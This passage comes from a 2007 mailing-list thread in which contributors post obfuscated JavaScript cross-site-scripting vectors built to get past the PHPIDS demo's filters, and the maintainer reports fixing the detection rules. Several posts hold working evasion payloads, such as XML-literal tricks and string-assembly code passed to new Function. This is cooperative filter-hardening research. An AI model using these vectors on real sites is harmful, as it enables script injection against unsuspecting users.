waiting) :)!!
.mario
</copy&paste>
On Sep 17, 6:27 pm, xorrer <obhvsbypqg...@gmail.com> wrote:
> Ah, ok.
>
> http://demo.php-ids.org/?test=a%3C%2Ftd%3E%C3%A4%3C%2Ftr%3E%C3%A4%3C%...
> ...
On Sep 17, 10:30 pm, Mario Heiderich <Mario.Heider...@googlemail.com>
wrote:
> ...
and here's my first one using the xml tags... and also the shortest
one i've found in a long time.
a=<r>loca<v>e</v>tion.has<v>va</v>h.subs<v>l</v>tr(1)</r>
{b=0e0[a.v.text()
]}http='';b(b(http+a.text()
))
On Sep 18, 5:03 am, thornmaker <thornma...@gmail.com> wrote:
> @xorrer : i just learned from your vector that a reg exp can be used
> as the boolean with the ternary operator... that's cool!
> @gareth : good stuff there... and here i thought 'function' was
> filtered, but never even tried it
> @.mario : http://xkcd.com/208/ - did i show you this comic already? i
> have a bad memory for stuff like that... anyhow... everytime i think
> of you fixing the filters, this comic comes to mind.
>
> and here's my first one using the xml tags... and also the shortest
> one i've found in a long time.
>
> http://demo.php-ids.org/?test=%61%3D%3C%72%3E%6C%6F%63%61%3C%76%3E%65...
On Sep 18, 6:10 am, Gareth <gazhe...@gmail.com> wrote:
> s=function test2() {return 'aalert(1)a';1,1}();
> void(a = {} );
> a.a1=function xyz() {return s[1] }();
> a.a2=function xyz() {return s[2] }();
> a.a3=function xyz() {return s[3] }();
> a.a4=function xyz() {return s[4] }();
> a.a5=function xyz() {return s[5] }();
> a.a6=function xyz() {return s[6] }();
> a.a7=function xyz() {return s[7] }();
> a.a8=function xyz() {return s[8] }();
> $=function xyz() {return a.a1 + a.a2 + a.a3 +a.a4 +a.a5 + a.a6 + a.a7
> +a.a8 }();
> new Function($)();
>
> On Sep 18, 5:03 am, thornmaker <thornma...@gmail.com> wrote:
>
> > @xorrer : i just learned from your vector that a reg exp can be used
> > as the boolean with the ternary operator... that's cool!
> > @gareth : good stuff there... and here i thought 'function' was
> > filtered, but never even tried it
> > > @.mario : http://xkcd.com/208/ - did i show you this comic already? i
On Sep 18, 9:19 am, "Mario Heiderich" <mario.heider...@googlemail.com>
wrote:
> Hi!
>
> Nice ones again! I am still struggling with the last xml predicate vector
> and think about adding an own rule to detect those kinds of attacks. The
> other ones are fixed...
>
> @thornmaker: yep - knew the comic. Unfortunately no lianas in our office ;)
>
> 2007/9/18, Gareth <gazhe...@gmail.com>:
>
> > x = localName.toLowerCase() + 'lert(1),' + 0x00;new Function(x)()
>
> > On Sep 18, 6:10 am, Gareth <gazhe...@gmail.com> wrote:
> > > s=function test2() {return 'aalert(1)a';1,1}();
> > > void(a = {} );
> > > a.a1=function xyz() {return s[1] }();
> > > a.a2=function xyz() {return s[2] }();
> > > a.a3=function xyz() {return s[3] }();
> > > a.a4=function xyz() {return s[4] }();
> > > a.a5=function xyz() {return s[5] }();
> > > a.a6=function xyz() {return s[6] }();
> > > a.a7=function xyz() {return s[7] }();
> > > a.a8=function xyz() {return s[8] }();
> > > $=function xyz() {return a.a1 + a.a2 + a.a3 +a.a4 +a.a5 + a.a6 + a.a7
> > > +a.a8 }();
> > > new Function($)();
>
> > > On Sep 18, 5:03 am, thornmaker <thornma...@gmail.com> wrote:
>
> > > > @xorrer : i just learned from your vector that a reg exp can be used
> > > > as the boolean with the ternary operator... that's cool!
> > > > @gareth : good stuff there... and here i thought 'function' was
> > > > filtered, but never even tried it
> > > > @.mario : http://xkcd.com/208/ - did i show you this comic already? i
Btw. are you already considering adding support for some of the new
JS functionalities in Firefox 3, where something like this
http://demo.php-ids.org/?test=function+%C3%B6%28h%29+%27evlar%28tXS%29%27%5Bh%5D%3B%0D%0A%C3%A4.a+%3D+%C3%B6%281%29%2C
would work (not a complete example, just to show off the new lambda
notation).